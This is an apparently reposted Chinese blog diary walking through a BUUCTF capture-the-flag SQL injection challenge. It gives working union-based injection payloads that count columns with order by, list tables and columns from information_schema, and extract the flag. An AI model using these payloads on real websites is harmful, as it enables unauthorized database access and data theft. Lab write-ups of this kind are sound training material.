其他分享
首页 > 其他分享> > BUUCTF刷题系列(1)5.25日记

BUUCTF刷题系列(1)5.25日记

作者:互联网

前面的题目都不太难,就直接从SQL注入开始了。

 

这个样子的话,明显就是注入,我们先拿出SQL语句:http://fb415201-6634-4fc3-a6bc-a67b84ea1ed2.node3.buuoj.cn/index.php?id=1

1‘报错
1' or 1=1 --+ 正常,Ok随后order by 到3没问题 4就报错

注:没显示什么就是报错了。

order by主要是用来查看这个注入点网页显示多少字段,比如order by9不报错,order by10报错,那么这个网页就有9个字段,最后手动爆库的时候,union select 1,2,3,4,5,7,8,9

 

接下来我们开始查库查表查字段

  查库名
  payload:?id=-1' union select 1,database(),3 --+
  回显说数据库名就是 note

 查表名

?id=-1' union select 1,database(),table_name from information_schema.tables where table_schema='note' limit 0,1 --+

?id=-1' union select 1,database(),table_name from information_schema.tables where table_schema='note' limit 1,1 --+

 

相比之下 fl4g更可疑一些,先查一下它的字段
  payload:?id=-1' union select 1,database(), group_concat(column_name) from information_schema.columns where table_name='fl4g' --+
  成功得到列名


查询字段
  payload:?id=-1' union select 1,database(), group_concat(fllllag) from fl4g --+
  得到flag了!

 

标签:BUUCTF,union,5.25,报错,--+,table,id,select,刷题
来源: https://www.cnblogs.com/fengnianxu/p/14808480.html